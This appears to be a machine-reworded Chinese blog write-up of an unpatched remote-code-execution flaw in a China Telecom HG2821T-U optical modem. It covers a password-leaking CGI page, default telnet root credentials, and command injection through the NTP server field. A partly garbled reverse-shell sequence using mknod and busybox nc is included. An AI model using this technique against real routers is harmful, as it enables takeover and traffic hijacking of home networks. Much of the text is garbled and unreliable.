它是以前发现的自己用的电信网光猫的后台管理系统rce，可是因为有一个信息泄露一拖再拖沒有恢复，因此 无需了解后台管理登陆密码也可以直接进入后台管理，直到如今也没有恢复。先上一一键反跳shell脚本 *** 详细地址 ，千山万水一直情，点个star可不可以。

那时候漏洞交到过补天，根据以后由于一些“标准”难题被忽略了，交到电信网研究所随后就没声了，最终交到cnvd混了张资格证书，本来认为能混到CVE，結果只有搞个CNVD。漏洞到现在早已超出大半年，思忖着即使公布也没什么事吧。近期恰好有朋友们问如何取得源码的，因此 看一下写详尽点是否可以使混到伙食费。

获得源代码全过程

取得光猫的情况下，我也nmap扫了一哈，外网地址不可以浏览80端口，可是能够浏览8080端口，关键是电信网一波光猫有一个信息泄露，能够见到客户智能管理系统和8080端口上系统软件的登陆密码保密这一信息泄露如今都还没修，随后我也进了后台管理。

信息泄露详细地址在 ，破译标准也早已被分配了 ，脚本 *** 里也都写了。

进到系统软件后，就随意翻一翻，寻找个地区，能够立即改动useradmin登陆密码，算个csrf（80端口上无线路由器智能管理系统的客户名叫useradmin，8080端口智能管理系统上的客户名叫telecomadmin）？

那如何进入这一光猫的系统软件呢？硬件配置牛外盖一拆就能直捣黄龙了，我也想，可是实力不允许。随后就意外惊喜发现在光猫的环境变量中，更先插装式出原环境变量，在管理 *** -设备维护，插个U盘，备份数据配备就可以。发现了telnet的配备，默认设置为0，刚刚扫端口的情况下也没开23,22这种的，那试着改个1试一下，随后再扫一次端口，就发现稳了。telnet帐户登陆密码写在环境变量里了，我它是root/abcd，随后立即进来便是root shell了。

P.S.这儿有一个难题，便是telnet开过以后，外网地址的别人还可以根据光猫分派的公网地址来登录telnet，因此 如果有那么实际操作的，还记得关掉telnet。

一些简易的剖析

机器设备硬手机软件隶属生产商及型号规格

硬件配置：电信网光猫HG2821T-U

手机软件：天翼家庭智能网关

机器设备应用范畴

该机器设备是2018年江苏省安裝中国电信宽带时附加的光猫。根据源码财务审计发现该机器设备很有可能存有于以下33个省份 ，编码以下：

漏洞发现全过程

1）默认设置侧门获得光猫管理 *** 端登陆密码（互联网上面有网址已公布，可是沒有该难题一样会根据源码发现2号漏洞）在baseinfoSet.cgi中发现立即复印了telecomaccount/telecompassword和useraccount/userpassword 的等自变量，

发现电信网光猫存有侧门，能够见到客户智能管理系统和8080端口上系统软件的登陆密码保密，侧门途径为 如图所示：

登陆密码依据在网上公布的破译 *** 能够开展破译。

2）光猫后台管理系统一处随意指令实行

大约看过下编码，有一个地区接纳手机客户端设定的ntp服务器详细地址：

挑选NTPSERVER1主要参数追踪：

在获得递交要求后，把NTPSERVER1作为主要参数根据$inter_web实行某一指令，追踪inter_web ，发现是某一可执行程序，可是发现IPADDRESS参数是根据该文件获得，推断inter_web会去实行某一指令检测ntpserver1 的生存性或者别的

下面依据财务审计猜测开展检测，漏洞出現在8080端口上的管理 *** 端，在设置数据同步 *** 服务器处存有远程控制代码执行，因为光猫仍未内置bash，因此 应用sh 建立一个通讯管路，用反引号包囊，再开展反跳，因为光猫内嵌的是 *** 版的linux，因此 猜想会出现busybox，检测发现busybox 含有nc：

~ mknod /tmp/backpipe p

~ /bin/sh0/tmp/backpipe

并应用nc开展反跳的shell的接受，检测发现光猫上应用的便是busybox ：

一样的 *** 反跳到临时性新创建的云服务器上：

即然能够获得root shell，那麼 *** 劫持，监视客户总流量当然都能够保证。

运用限定标准

联接到光猫或他的儿子在网上，浏览光猫内网地址（默认设置192.168.1.1）的8080端口的web 服务项目，因此 事实上问题不大。